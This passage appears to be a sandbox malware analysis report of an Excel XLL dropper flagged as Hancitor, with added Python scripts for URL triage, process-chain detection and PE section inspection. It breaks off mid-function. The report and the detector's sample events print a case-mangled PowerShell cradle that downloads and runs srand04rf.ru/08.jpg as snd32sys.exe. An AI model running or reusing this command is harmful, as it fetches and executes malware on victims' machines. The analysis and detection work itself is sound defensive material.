Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://staging.cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://store.office.cn/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://store.office.com/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://store.office.de/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://tasks.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://templatelogging.office.com/client/log
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://web.microsoftstream.com/video/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://webshell.suite.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://wus2.contentsync.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://wus2.pagecontentsync.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://www.odwebp.svc.ms
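Almost all of the URLs above come from F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr, an Office web-service cache written by EXCEL.EXE, and are ordinary Microsoft service endpoints; the strings that matter for blocking and hunting are the ones carved from the powershell.exe memory dumps and the PowerShell transcript (srand04rf.ru, the host 08.jpg was fetched from). The script below is an added example, not part of the Joe Sandbox report: it parses rows of the form "Source: <artifact> | String found in binary or memory: <url>" (the fused form without the separator is accepted too), groups URLs by host, and splits them into benign vendor noise, truncated fragments such as "https://cdn.entity.", and the remaining suspects, folding carved trailing bytes ("srand04rf.ru4&jt") back onto the real host. The benign-suffix list is an assumption for the example and must be tuned per environment; the sample rows are copied from this report.

```python
"""Triage the 'String found in binary or memory' rows of a sandbox report.

Added example, not code from the report. Groups carved URLs by host and
separates vendor noise and truncated fragments from the hosts worth acting on.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Assumption for this example: domain suffixes treated as benign infrastructure
# (Office/Microsoft telemetry, PowerShell package-management assets, licence
# text, the code-signing CA's policy URL). Tune per environment.
BENIGN_SUFFIXES = (
    "office.com", "office.net", "live.com", "live.net", "microsoft.com",
    "microsoftonline.com", "windows.net", "msn.com", "onenote.com",
    "outlook.com", "office365.com", "azure.com", "azurewebsites.net",
    "skype.com", "lync.com", "msedge.net", "bingapis.com", "cortana.ai",
    "acompli.net", "dynamics.com", "uservoice.com", "getmicrosoftkey.com",
    "svc.ms", "o365filtering.com", "xmlsoap.org", "apache.org",
    "pesterbdd.com", "github.com", "nuget.org", "contoso.com", "sectigo.com",
)

# Accepts both 'Source: X | String found ...' and the fused 'Source: XString found ...'.
ROW_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)"
)


def parse_rows(text):
    """Yield (source artifact, url) for every report row that parses."""
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if m:
            yield m.group("src").strip(), m.group("url")


def host_of(url):
    """Return (host, truncated) for a URL carved from memory.

    Carved strings are often cut short ('https://cdn.entity.') or carry junk
    after the URL ('http://srand04rf.ru4&jt'); the host is cut at the first
    character that cannot appear in a hostname and flagged if it looks cut.
    """
    raw = (urlsplit(url).hostname or "").lower()
    m = re.match(r"[a-z0-9.-]+", raw)
    host = m.group(0) if m else ""
    truncated = host.endswith(".") or "." not in host
    return host.rstrip("."), truncated


def is_benign(host):
    return any(host == s or host.endswith("." + s) for s in BENIGN_SUFFIXES)


def fold_carved_hosts(groups):
    """Merge 'srand04rf.ru4' into 'srand04rf.ru': a shorter known host that is a
    prefix of a longer one is taken to be the real host plus carved bytes."""
    folded = {}
    for host in sorted(groups, key=len):
        target = next((h for h in folded if host.startswith(h) and host != h), host)
        folded.setdefault(target, []).extend(groups[host])
    return folded


def triage(text):
    """Bucket rows into suspect / benign / truncated; each maps host -> [(source, url)]."""
    buckets = {"suspect": defaultdict(list), "benign": defaultdict(list),
               "truncated": defaultdict(list)}
    for src, url in parse_rows(text):
        host, truncated = host_of(url)
        if not host:
            continue
        key = "truncated" if truncated else ("benign" if is_benign(host) else "suspect")
        buckets[key][host].append((src, url))
    buckets["suspect"] = fold_carved_hosts(buckets["suspect"])
    return {k: dict(v) for k, v in buckets.items()}


# Rows copied from the report above (a representative subset).
SAMPLE_ROWS = """\
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://login.microsoftonline.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://cdn.entity.
Source: powershell.exe, 00000006.00000002.333951627.0000000004CEF000.00000004.00000001.sdmp | String found in binary or memory: http://srand04rf.ru
Source: powershell.exe, 00000006.00000002.333971406.0000000004CF7000.00000004.00000001.sdmp | String found in binary or memory: http://srand04rf.ru/08
Source: PowerShell_transcript.888683.93l2YHGR.20210708163033.txt.6.dr | String found in binary or memory: http://srand04rf.ru/08.jpg
Source: powershell.exe, 00000006.00000002.332529239.0000000004AEB000.00000004.00000001.sdmp | String found in binary or memory: http://srand04rf.ru4&jt
Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: 0708_5355150121.xll | String found in binary or memory: https://sectigo.com/CPS0
"""

if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    for host, hits in result["suspect"].items():
        artifacts = sorted({src.split(",")[0] for src, _ in hits})
        print(f"SUSPECT {host}: {len(hits)} strings in {', '.join(artifacts)}")
    print(f"benign hosts: {len(result['benign'])}, truncated: {sorted(result['truncated'])}")
```

Grouping by source artifact is the useful part: a host that appears only in the Office cache file is telemetry, while one that appears in powershell.exe memory and in the PowerShell transcript was actually requested during the run. Truncated fragments are kept in their own bucket rather than dropped so that an analyst can still review them.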

System Summary:

Malicious sample detected (through community Yara rule)
Source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE | Matched rule: Hancitor Payload Author: kevoreilly
Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE | Matched rule: Hancitor Payload Author: kevoreilly
Source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE | Matched rule: Hancitor Payload Author: kevoreilly
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\snd32sys.exe
Source: C:\Users\Public\snd32sys.exe | Process Stats: CPU usage > 98%
Source: C:\Windows\SysWOW64\mshta.exe | Code function: 1_3_064950B7
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04B2E6702_2_04B2E670
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0064315416_2_00643154
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0063A1B716_2_0063A1B7
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0063C25016_2_0063C250
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0064920D16_2_0064920D
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0064338616_2_00643386
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062D39F16_2_0062D39F
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062942016_2_00629420
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_006435C716_2_006435C7
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0065F68B16_2_0065F68B
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0063970716_2_00639707
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062D71116_2_0062D711
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0063C7C016_2_0063C7C0
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0065F7AB16_2_0065F7AB
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0064382C16_2_0064382C
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0065B83016_2_0065B830
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062D9BB16_2_0062D9BB
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00643AA016_2_00643AA0
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062CB2016_2_0062CB20
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0063CBF016_2_0063CBF0
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00652C0316_2_00652C03
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00642CE116_2_00642CE1
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062DC8216_2_0062DC82
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00643D0516_2_00643D05
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062DF3D16_2_0062DF3D
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00642F1316_2_00642F13
        Source: C:\Users\Public\snd32sys.exeCode function: String function: 0062B2C4 appears 61 times
        Source: C:\Users\Public\snd32sys.exeCode function: String function: 0062BBA0 appears 50 times
        Source: C:\Users\Public\snd32sys.exeCode function: String function: 0062B2F8 appears 46 times
        Source: 0708_5355150121.xllStatic PE information: invalid certificate
        Source: snd32sys.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: snd32sys.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: 0708_5355150121.xllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
        Source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
        Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
        Source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
        Source: 00000001.00000003.225595145.0000000006590000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000001.00000003.224640872.0000000002F76000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000001.00000002.227307568.0000000002F76000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000001.00000003.225197640.0000000002F76000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000002.00000002.348453730.0000000004B30000.00000004.00000040.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000002.00000003.262530252.0000000007E07000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000001.00000003.224221003.0000000002F76000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000001.00000003.225049085.0000000002F76000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: classification engine | Classification label: mal100.troj.expl.evad.winXLL@10/11@4/4
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_01
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{0A2181D0-DD23-4259-8109-9971A9896497} - OProcSessId.dat
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
        Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\snd32sys.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: 0708_5355150121.xll | Virustotal: Detection: 23%
        Source: 0708_5355150121.xll | ReversingLabs: Detection: 17%
        Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'
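        The process chain above (Excel loading the XLL, mshta.exe running C:\Users\Public\res32.hta, a case-mangled PowerShell download cradle, and the dropped snd32sys.exe) and the PowerShell_Case_Anomaly memory hits listed earlier are the same artefact seen from two angles. Three details are worth reading off the command lines before writing a detection. First, powershell.exe accepts any unambiguous, case-insensitive prefix of a switch, so -EX is -ExecutionPolicy, -NOp is -NoProfile and -w 1 is -WindowStyle with the numeric value of Hidden; WGeT and sTart are the built-in aliases of Invoke-WebRequest and Start-Process. Second, the outer powershell.exe is handed the literal text poWerSHEll.eXE -EX ... as its command, which is why a second powershell.exe appears for the download while the outer one starts the dropped file afterwards. Third, the command line names C:\Windows\System32\...\powershell.exe but the image that ran is under C:\Windows\SysWOW64: the 32-bit mshta.exe (spawned by 32-bit Excel) is subject to WOW64 file-system redirection, so a rule should match on the image basename rather than the full path. The following is an added detection example, not part of the report and not code from the sandbox vendor: it runs over constructed Sysmon Event ID 1-style process-creation records that mirror the report's command lines, normalises the case-mangled tokens, switch prefixes and aliases, and flags the chain. The event records, the keyword list and the thresholds are assumptions made for the example.

```python
"""Added example (not from the report): flag the Office -> mshta -> PowerShell
download cradle -> dropped EXE chain from process-creation events.
EVENTS below are constructed Sysmon Event ID 1-style records that mirror the
report's command lines; they are not the sandbox's raw log."""
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# powershell.exe takes any unambiguous, case-insensitive prefix of a switch:
# -EX is -ExecutionPolicy, -NOp is -NoProfile, -w is -WindowStyle.
PS_SWITCHES = ["executionpolicy", "noprofile", "windowstyle", "encodedcommand",
               "command", "noninteractive", "nologo", "file"]
# Built-in aliases that download cradles lean on.
PS_ALIASES = {"wget": "invoke-webrequest", "iwr": "invoke-webrequest", "curl": "invoke-webrequest",
              "start": "start-process", "saps": "start-process", "iex": "invoke-expression"}
# Keywords whose casing we care about, with the accepted PascalCase spelling (if any).
# Lower-case, UPPER-case and Capitalized forms are always accepted.
CANONICAL = {"powershell": {"PowerShell"}, "exe": set(), "bypass": set(), "nop": set(),
             "noprofile": {"NoProfile"}, "outfile": {"OutFile"}, "windowstyle": {"WindowStyle"},
             "executionpolicy": {"ExecutionPolicy"}, "encodedcommand": {"EncodedCommand"},
             "wget": set(), "iwr": set(), "iex": set(), "start": set(), "hidden": set(),
             "invoke-webrequest": {"Invoke-WebRequest"}, "start-process": {"Start-Process"}}
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")
PUBLIC = "\\users\\public\\"

PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed sample input, modelled on the report's process tree
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "cmd": r'"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /dde'},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmd": r'"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\res32.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}'},
    {"pid": 102, "ppid": 101, "image": PS32,  # outer shell: runs a nested powershell, then sTart
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" poWerSHEll.eXE -EX bYpASs -NOp -w 1 '
            r"WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'"},
    {"pid": 103, "ppid": 102, "image": PS32,  # nested shell: performs the download
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpASs -NOp -w 1 '
            r"WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe"},
    {"pid": 104, "ppid": 102, "image": r"C:\Users\Public\snd32sys.exe", "cmd": r'"C:\Users\Public\snd32sys.exe"'},
    {"pid": 200, "ppid": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # benign control
     "cmd": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def case_anomaly_tokens(cmdline: str) -> list:
    """Keywords spelled in a casing nobody types by hand (poWerSHEll, bYpASs, OuTfIle)."""
    odd = []
    for w in re.findall(r"[A-Za-z][A-Za-z-]*", cmdline):
        key = w.lower()
        if key in CANONICAL and w not in (key, key.upper(), key.capitalize()) and w not in CANONICAL[key]:
            odd.append(w)
    return odd


def normalize_ps(cmdline: str) -> list:
    """Lower-case the tokens, expand switch prefixes and cradle aliases."""
    out = []
    for tok in re.findall(r"'[^']*'|\"[^\"]*\"|\S+", cmdline):
        t = tok.strip("'\" ").lower()          # the sample's URL carries a trailing space inside the quotes
        if t.startswith("-") and t[1:]:
            hits = [s for s in PS_SWITCHES if s.startswith(t[1:])]
            if len(hits) == 1:
                t = "-" + hits[0]
        out.append(PS_ALIASES.get(t, t))
    return out


def cradle_indicators(tokens: list) -> dict:
    ind = {"download": "invoke-webrequest" in tokens, "bypass": False, "hidden": False,
           "url": None, "outfile": None, "launches_outfile": False}
    for i, t in enumerate(tokens):
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if t == "-executionpolicy" and nxt == "bypass":
            ind["bypass"] = True
        if t == "-windowstyle" and nxt in ("hidden", "1"):   # 1 == ProcessWindowStyle.Hidden
            ind["hidden"] = True
        if t == "-outfile":
            ind["outfile"] = nxt
        if t.startswith(("http://", "https://")):
            ind["url"] = t
    if ind["outfile"]:
        ind["launches_outfile"] = any(tokens[j] == "start-process" and tokens[j + 1] == ind["outfile"]
                                      for j in range(len(tokens) - 1))
    return ind


def assess(events: list) -> dict:
    """{pid: [reasons]} for every shell process; an empty list means nothing suspicious."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for e in events:
        if basename(e["image"]) not in SHELLS:
            continue
        reasons, chain, p = [], [], by_pid.get(e["ppid"])
        while p:                                   # walk the ancestry by basename
            chain.append(basename(p["image"]))
            p = by_pid.get(p["ppid"])
        if chain and chain[0] in SCRIPT_HOSTS:
            reasons.append("spawned by " + chain[0])
        if any(c in OFFICE_APPS for c in chain):
            reasons.append("Office application in ancestry")
        odd = case_anomaly_tokens(e["cmd"])
        if len(odd) >= 2:
            reasons.append("case-mangled tokens: " + ",".join(odd))
        ind = cradle_indicators(normalize_ps(e["cmd"]))
        if ind["download"] and ind["outfile"]:
            reasons.append("download cradle writing " + ind["outfile"])
        if ind["bypass"] and ind["hidden"]:
            reasons.append("-ExecutionPolicy Bypass with hidden window")
        if ind["outfile"] and PUBLIC in ind["outfile"]:
            reasons.append("drop into C:\\Users\\Public")
        if ind["url"] and ind["url"].endswith(IMAGE_EXTS) and ind["outfile"] and ind["outfile"].endswith(".exe"):
            reasons.append("image URL saved as .exe")
        if ind["launches_outfile"]:
            reasons.append("launches the downloaded file")
        for c in events:                           # children started out of the drop location
            if c["ppid"] == e["pid"] and PUBLIC in c["image"].lower():
                reasons.append("child executed from C:\\Users\\Public: " + basename(c["image"]))
        findings[e["pid"]] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in assess(EVENTS).items():
        print(pid, reasons or "clean")
```

Matching on the normalised token list rather than on the raw string is the point: a rule that looks for the literal string "-ExecutionPolicy Bypass" misses "-EX bYpASs", and one that looks for "Invoke-WebRequest" misses "WGeT". The benign control process (plain casing, no cradle, no Office or script-host ancestor) comes back with no reasons.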
        Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
        Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
        Source: Binary string: c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb source: snd32sys.exe, snd32sys.exe.6.dr

        Data Obfuscation:

        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\Public\snd32sys.exe | Unpacked PE file: 16.2.snd32sys.exe.610000.0.unpack
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00613560 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,16_2_00613560
        Source: initial sample | Static PE information: section where entry point is pointing to: .img
        Source: 0708_5355150121.xll | Static PE information: section name: .img
        Source: 0708_5355150121.xll | Static PE information: section name: .ico
        Source: 0708_5355150121.xll | Static PE information: section name: .fyjrtr
        Source: 0708_5355150121.xll | Static PE information: section name: .rytkrer
        Source: 0708_5355150121.xll | Static PE information: section name: .reyery
        Source: 0708_5355150121.xll | Static PE information: section name: .txt
        Source: 0708_5355150121.xll | Static PE information: section name: .res
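        The section table above is the static basis for the "Entry point lies outside standard sections" signature: none of .img, .ico, .fyjrtr, .rytkrer, .reyery, .txt or .res is a name a normal linker emits, and the entry point sits in .img. Two caveats apply. An XLL is a DLL, so the entry point checked here is DllMain's stub, and Excel will call the exported xlAutoOpen regardless of where that stub lives; and this is a check on the file as delivered, whereas snd32sys.exe later overwrites its own PE header in memory and the Hancitor rule matched the unpacked image (16.2.snd32sys.exe.610000.0.unpack), not the file on disk. Below is an added example, not code from the report, the sandbox vendor or the sample: a minimal PE section-table reader that locates the section containing the entry point and lists non-standard section names. The PE it parses is constructed inside the block with the report's section names; its RVAs, sizes and characteristics are made up, because the report does not give them, and the list of "standard" names is an assumption of the example.

```python
"""Added example (not code from the report or the sample): a minimal PE section
table reader answering two of the report's static findings, "section where entry
point is pointing to" and non-standard section names, without third-party code.
build_pe() constructs a toy PE32 for the test; only the section names come from
the report, the RVAs and sizes are invented."""
import struct

# Names a normal MSVC/GCC/LLVM link step emits (assumed list); anything else is worth a look.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".pdata", ".rsrc", ".reloc",
                     ".bss", ".tls", ".crt", ".xdata", ".textbss", ".didat", ".00cfg", ".gfids"}
SAMPLE_SECTIONS = [".img", ".ico", ".fyjrtr", ".rytkrer", ".reyery", ".txt", ".res"]  # from the report


def parse_sections(pe: bytes):
    """Return (AddressOfEntryPoint, [(name, VirtualAddress, VirtualSize), ...])."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic not in (0x10B, 0x20B):                      # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    entry = struct.unpack_from("<I", pe, opt + 16)[0]    # same offset in PE32 and PE32+
    sections = []
    for i in range(nsec):                                # 40-byte IMAGE_SECTION_HEADERs follow the optional header
        name, vsize, va = struct.unpack_from("<8sII", pe, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, vsize))
    return entry, sections


def entry_section(entry: int, sections):
    """Name of the section containing the entry RVA, or None when it hits no section
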